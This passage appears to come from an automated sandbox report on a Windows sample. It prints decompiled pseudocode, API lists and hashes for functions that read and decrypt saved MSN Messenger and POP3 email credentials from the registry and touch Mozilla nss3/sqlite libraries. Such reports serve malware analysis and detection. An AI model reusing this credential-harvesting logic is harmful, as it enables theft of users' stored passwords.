                                                                        							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                                        						}
                                                                        						goto L12;
                                                                        						L14:
                                                                        						_v4 = _v4 + 1;
                                                                        						_t39 = _v4;
                                                                        					} while (_t39 < _a4);
                                                                        					goto L15;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                        • String ID: 0$6
                                                                        • API String ID: 1757351179-3849865405
                                                                        • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                        • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                        • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                        • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                        • memcpy.MSVCRT ref: 0040EA04
                                                                        • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                        Strings
                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                        • API String ID: 1640410171-2022683286
                                                                        • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                        • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                        • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                        • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004081B5(void* __eflags, char* _a4) {
                                                                        				void* __esi;
                                                                        				void* _t3;
                                                                        				int _t6;
                                                                        
                                                                        				_t3 = E0040614B(_a4);
                                                                        				if(_t3 != 0) {
                                                                        					strcpy(0x4171b8, _a4);
                                                                        					strcpy(0x4172c0, "general");
                                                                        					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
                                                                        					asm("sbb eax, eax");
                                                                        					 *0x417304 =  ~(_t6 - 1) + 1;
                                                                        					E00407DC1(0x417308, "charset", 0x3f);
                                                                        					E00407DC1(0x417348, "TranslatorName", 0x3f);
                                                                        					return E00407DC1(0x417388, "TranslatorURL", 0xff);
                                                                        				}
                                                                        				return _t3;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                        • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                        • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                          • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                        • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                        • API String ID: 185930432-2094606381
                                                                        • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                        • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                        • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                        • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DEA9() {
                                                                        				int _t3;
                                                                        				struct HINSTANCE__* _t5;
                                                                        				struct HINSTANCE__* _t6;
                                                                        				struct HINSTANCE__* _t9;
                                                                        
                                                                        				_t6 = GetModuleHandleA("nss3.dll");
                                                                        				_t5 = GetModuleHandleA("sqlite3.dll");
                                                                        				_t3 = GetModuleHandleA("mozsqlite3.dll");
                                                                        				_t9 = _t3;
                                                                        				if(_t6 != 0) {
                                                                        					_t3 = FreeLibrary(_t6);
                                                                        				}
                                                                        				if(_t5 != 0) {
                                                                        					_t3 = FreeLibrary(_t5);
                                                                        				}
                                                                        				if(_t9 != 0) {
                                                                        					return FreeLibrary(_t9);
                                                                        				}
                                                                        				return _t3;
                                                                        			}








                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(nss3.dll,73B757D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                        • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                        • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHandleLibraryModule
                                                                        • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                        • API String ID: 662261464-3550686275
                                                                        • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                        • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                        • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                        • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040E172(char* __edi, char* __esi) {
                                                                        				void _v267;
                                                                        				char _v268;
                                                                        				char* _t15;
                                                                        				void* _t38;
                                                                        				char* _t48;
                                                                        
                                                                        				_t49 = __esi;
                                                                        				_t48 = __edi;
                                                                        				if(__esi[1] != 0x3a) {
                                                                        					_t15 = strchr( &(__esi[2]), 0x3a);
                                                                        					if(_t15 == 0) {
                                                                        						_t38 = E004069D2(0, "\\systemroot");
                                                                        						if(_t38 < 0) {
                                                                        							if( *__esi != 0x5c) {
                                                                        								strcpy(__edi, __esi);
                                                                        							} else {
                                                                        								_v268 = 0;
                                                                        								memset( &_v267, 0, 0x104);
                                                                        								E00406325( &_v268);
                                                                        								memcpy(__edi,  &_v268, 2);
                                                                        								__edi[2] = 0;
                                                                        								strcat(__edi, __esi);
                                                                        							}
                                                                        						} else {
                                                                        							_v268 = 0;
                                                                        							memset( &_v267, 0, 0x104);
                                                                        							E00406325( &_v268);
                                                                        							strcpy(__edi,  &_v268);
                                                                        							_t8 =  &(_t49[0xb]); // 0xb
                                                                        							strcat(__edi, _t38 + _t8);
                                                                        						}
                                                                        						L11:
                                                                        						return _t48;
                                                                        					}
                                                                        					_push(_t15 - 1);
                                                                        					L4:
                                                                        					strcpy(_t48, ??);
                                                                        					goto L11;
                                                                        				}
                                                                        				_push(__esi);
                                                                        				goto L4;
                                                                        			}









                                                                        APIs
                                                                        • strchr.MSVCRT ref: 0040E18A
                                                                        • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                          • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                          • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                          • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                        • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                        • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                        • memset.MSVCRT ref: 0040E1CF
                                                                          • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                          • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                        • memset.MSVCRT ref: 0040E217
                                                                        • memcpy.MSVCRT ref: 0040E232
                                                                        • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                        • String ID: \systemroot
                                                                        • API String ID: 1680921474-1821301763
                                                                        • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                        • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                        • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                        • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00401A50(char* __edi, int __fp0) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				void* _v20;
                                                                        				int _v28;
                                                                        				int _v36;
                                                                        				void* _v40;
                                                                        				void* _v44;
                                                                        				void* _v48;
                                                                        				void* _v52;
                                                                        				void* _v56;
                                                                        				void* _v60;
                                                                        				char _v64;
                                                                        				int _t79;
                                                                        				intOrPtr _t80;
                                                                        				int _t81;
                                                                        				signed int _t94;
                                                                        				int _t98;
                                                                        				int _t100;
                                                                        				void* _t104;
                                                                        				void* _t106;
                                                                        				intOrPtr _t115;
                                                                        				char _t117;
                                                                        				char* _t118;
                                                                        				void* _t119;
                                                                        				void* _t120;
                                                                        				int _t122;
                                                                        				signed int _t123;
                                                                        				int* _t125;
                                                                        				int _t159;
                                                                        				int _t165;
                                                                        
                                                                        				_t159 = __fp0;
                                                                        				_t118 = __edi;
                                                                        				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                                        				_t79 = strlen(__edi);
                                                                        				asm("fldz");
                                                                        				_t104 = 0;
                                                                        				_v28 = __fp0;
                                                                        				_t120 = 0;
                                                                        				_t106 = _t119;
                                                                        				_v36 = _t79;
                                                                        				_v56 = 0;
                                                                        				_v52 = 0;
                                                                        				_v48 = 0;
                                                                        				_v44 = 0;
                                                                        				_v60 = 0;
                                                                        				_v40 = 0;
                                                                        				_v12 = 0x20;
                                                                        				_v20 = 0;
                                                                        				_v8 = 0;
                                                                        				_v16 = 0;
                                                                        				if(_t79 > 0) {
                                                                        					do {
                                                                        						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                                        						_v64 = _t117;
                                                                        						if(_t117 - 0x41 <= 0x19) {
                                                                        							_v56 = _v56 + 1;
                                                                        						}
                                                                        						if(_t117 - 0x61 <= 0x19) {
                                                                        							_v52 = _v52 + 1;
                                                                        						}
                                                                        						if(_t117 - 0x30 <= 9) {
                                                                        							_v48 = _v48 + 1;
                                                                        						}
                                                                        						if(_t117 - 0x20 <= 0xf) {
                                                                        							_v44 = _v44 + 1;
                                                                        						}
                                                                        						if(_t117 - 0x3a <= 6) {
                                                                        							_v60 = _v60 + 1;
                                                                        						}
                                                                        						if(_t117 - 0x5b <= 5) {
                                                                        							_v60 = _v60 + 1;
                                                                        						}
                                                                        						if(_t117 < 0x7b) {
                                                                        							L16:
                                                                        							if(_t117 > 0x7e) {
                                                                        								goto L17;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t117 > 0x7e) {
                                                                        								L17:
                                                                        								_v40 = _v40 + 1;
                                                                        							} else {
                                                                        								_v60 = _v60 + 1;
                                                                        								goto L16;
                                                                        							}
                                                                        						}
                                                                        						if(_t120 != _t104) {
                                                                        							_t94 = 0;
                                                                        							if(_v8 <= 0) {
                                                                        								L27:
                                                                        								_t94 = _t94 | 0xffffffff;
                                                                        							} else {
                                                                        								L21:
                                                                        								L21:
                                                                        								if(_t94 < 0 || _t94 >= _v8) {
                                                                        									_t115 = 0;
                                                                        								} else {
                                                                        									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                                        								}
                                                                        								if(_t115 == _t117) {
                                                                        									goto L28;
                                                                        								}
                                                                        								_t94 = _t94 + 1;
                                                                        								if(_t94 < _v8) {
                                                                        									goto L21;
                                                                        								} else {
                                                                        									goto L27;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        							_t104 = 0;
                                                                        							if(_t94 < 0) {
                                                                        								E004045E8( &_v20, _v64);
                                                                        								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                                        								_pop(_t106);
                                                                        								if(_t98 != 1) {
                                                                        									_t47 = _t98 - 2; // -2
                                                                        									_t106 = _t47;
                                                                        									if(_t106 > 3) {
                                                                        										if(_t98 < 6) {
                                                                        											if(_t98 > 0xa) {
                                                                        												goto L40;
                                                                        											}
                                                                        										} else {
                                                                        											if(_t98 > 0xa) {
                                                                        												goto L40;
                                                                        											} else {
                                                                        												_t159 = _v28 +  *0x414510;
                                                                        											}
                                                                        											goto L41;
                                                                        										}
                                                                        									} else {
                                                                        										_t159 = _v28 +  *0x414518;
                                                                        										goto L41;
                                                                        									}
                                                                        								} else {
                                                                        									_t165 = _v28;
                                                                        									goto L30;
                                                                        								}
                                                                        							} else {
                                                                        								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                                        								_t165 = _v28;
                                                                        								_pop(_t106);
                                                                        								if(_t100 != 0) {
                                                                        									_t159 = _t165 +  *0x414520;
                                                                        								} else {
                                                                        									L30:
                                                                        									_t159 = _t165 +  *0x414528;
                                                                        								}
                                                                        								goto L41;
                                                                        							}
                                                                        						} else {
                                                                        							E004045E8( &_v20, _v64);
                                                                        							L40:
                                                                        							_t159 = _v28 +  *0x414508;
                                                                        							L41:
                                                                        							_v28 = _t159;
                                                                        						}
                                                                        						_t120 = _t120 + 1;
                                                                        					} while (_t120 < _v36);
                                                                        				}
                                                                        				_v64 = _t104;
                                                                        				_t80 = 0x1a;
                                                                        				if(_v56 != _t104) {
                                                                        					_v64 = _t80;
                                                                        				}
                                                                        				if(_v52 != _t104) {
                                                                        					_v64 = _v64 + _t80;
                                                                        				}
                                                                        				if(_v48 != _t104) {
                                                                        					_v64 = _v64 + 0xa;
                                                                        				}
                                                                        				if(_v44 != _t104) {
                                                                        					_v64 = _v64 + 0x10;
                                                                        				}
                                                                        				if(_v60 != _t104) {
                                                                        					_v64 = _v64 + 0x11;
                                                                        				}
                                                                        				if(_v40 != _t104) {
                                                                        					_v64 = _v64 + 0x1e;
                                                                        				}
                                                                        				if(_v64 <= _t104) {
                                                                        					if(_v20 != _t104) {
                                                                        						free(_v20);
                                                                        					}
                                                                        					_t81 = 0;
                                                                        				} else {
                                                                        					asm("fild dword [esp+0xc]");
                                                                        					_push(_t106);
                                                                        					_push(_t106);
                                                                        					 *_t125 = _t159;
                                                                        					L004115B8();
                                                                        					_v36 = _t159;
                                                                        					 *_t125 =  *0x414500;
                                                                        					L004115B8();
                                                                        					asm("fdivr qword [esp+0x30]");
                                                                        					asm("fistp qword [esp+0x30]");
                                                                        					_t122 = _v28;
                                                                        					if(_v20 != _t104) {
                                                                        						free(_v20);
                                                                        					}
                                                                        					_t81 = _t122;
                                                                        				}
                                                                        				return _t81;
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: free$strlen
                                                                        • String ID:
                                                                        • API String ID: 667451143-3916222277
                                                                        • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                        • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                        • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                        • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D4A6(char* __ebx, void** _a4) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				void* _v20;
                                                                        				int _v24;
                                                                        				char* _v28;
                                                                        				char _v32;
                                                                        				char _v556;
                                                                        				char _v557;
                                                                        				char _v1578;
                                                                        				void _v1580;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				long _t39;
                                                                        				int _t43;
                                                                        				char _t48;
                                                                        				char* _t63;
                                                                        				int* _t67;
                                                                        
                                                                        				_t63 = __ebx;
                                                                        				_t67 = 0;
                                                                        				_v16 = 0;
                                                                        				_v12 = 0x400;
                                                                        				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
                                                                        				if(_t39 != 0) {
                                                                        					L13:
                                                                        					RegCloseKey( *_a4);
                                                                        					return _v16;
                                                                        				}
                                                                        				_t43 = _t39 + 1;
                                                                        				if(_v12 <= _t43) {
                                                                        					goto L13;
                                                                        				}
                                                                        				_t74 = _v1580 - 0x20;
                                                                        				_v8 = 0;
                                                                        				if(_v1580 >= 0x20) {
                                                                        					_v8 = _t43;
                                                                        					L10:
                                                                        					if(_v8 != _t67) {
                                                                        						_v557 = 0;
                                                                        						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
                                                                        						_v8 = 0xff;
                                                                        						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
                                                                        						if(_t48 == 0) {
                                                                        							_t63[0xfe] = _t48;
                                                                        							_t63[0x1fe] = _t48;
                                                                        							_v16 = 1;
                                                                        						}
                                                                        					}
                                                                        					goto L13;
                                                                        				}
                                                                        				_t69 =  &_v556;
                                                                        				E004046D7( &_v556);
                                                                        				if(E004047A0(_t69, _t74) == 0) {
                                                                        					L8:
                                                                        					E004047F1( &_v556);
                                                                        					_t67 = 0;
                                                                        					goto L10;
                                                                        				}
                                                                        				_v32 = _v12 + 0xfffffffe;
                                                                        				_v28 =  &_v1578;
                                                                        				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
                                                                        					goto L8;
                                                                        				}
                                                                        				if(_v24 < 0x400) {
                                                                        					memcpy( &_v1580, _v20, _v24);
                                                                        					_v8 = 1;
                                                                        				}
                                                                        				LocalFree(_v20);
                                                                        				goto L8;
                                                                        			}

                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,73AFF420), ref: 0040D4D5
                                                                        • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • memcpy.MSVCRT ref: 0040D546
                                                                        • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                        • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                        • API String ID: 3289975857-105384665
                                                                        • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                        • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                        • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                        • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                                        				char _v12;
                                                                        				short* _v16;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				char _v28;
                                                                        				char _v288;
                                                                        				char _v544;
                                                                        				char _v800;
                                                                        				char _v1056;
                                                                        				char _v1584;
                                                                        				void _v2607;
                                                                        				char _v2608;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t36;
                                                                        				void* _t63;
                                                                        				char* _t66;
                                                                        				void* _t68;
                                                                        
                                                                        				_t63 = __ecx;
                                                                        				_v2608 = 0;
                                                                        				memset( &_v2607, 0, 0x3ff);
                                                                        				_v12 = 0x400;
                                                                        				_v1056 = 0;
                                                                        				_v800 = 0;
                                                                        				_v544 = 0;
                                                                        				_v288 = 0;
                                                                        				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
                                                                        				_t72 = _t36;
                                                                        				if(_t36 != 0) {
                                                                        					return _t36;
                                                                        				}
                                                                        				_t67 =  &_v1584;
                                                                        				E004046D7( &_v1584);
                                                                        				if(E004047A0( &_v1584, _t72) != 0) {
                                                                        					_v24 =  &_v2608;
                                                                        					_v28 = _v12;
                                                                        					_t16 =  &_v20; // 0x407221
                                                                        					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
                                                                        						_t19 =  &_v20; // 0x407221
                                                                        						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
                                                                        						LocalFree(_v16);
                                                                        						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
                                                                        						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
                                                                        						_t28 =  &_a12; // 0x407221
                                                                        						_t66 =  &_v1056;
                                                                        						E004060D0(0xff, _t66,  *_t28);
                                                                        						 *((intOrPtr*)( *_a4))(_t66);
                                                                        					}
                                                                        				}
                                                                        				return E004047F1( &_v1584);
                                                                        			}























                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040708D
                                                                          • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,73AFED80,?), ref: 00407138
                                                                          • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                        • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                        • API String ID: 604216836-250559020
                                                                        • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                        • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                        • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                        • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00405E46(long __edi, char* _a4) {
                                                                        				char _v8;
                                                                        				void* _t8;
                                                                        				void* _t10;
                                                                        				long _t14;
                                                                        				long _t24;
                                                                        
                                                                        				_t24 = __edi;
                                                                        				_t1 = _t24 - 0x834; // -2100
                                                                        				_t8 = 0;
                                                                        				_t14 = 0x1100;
                                                                        				if(_t1 <= 0x383) {
                                                                        					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                                                        					if(0 != 0) {
                                                                        						_t14 = 0x1900;
                                                                        					}
                                                                        				}
                                                                        				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                        					_t10 = strcpy(_a4, "Unknown Error");
                                                                        				} else {
                                                                        					if(strlen(_v8) < 0x400) {
                                                                        						strcpy(_a4, _v8);
                                                                        					}
                                                                        					_t10 = LocalFree(_v8);
                                                                        				}
                                                                        				return _t10;
                                                                        			}









                                                                        APIs
                                                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                        • strlen.MSVCRT ref: 00405E96
                                                                        • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                        • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                        • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
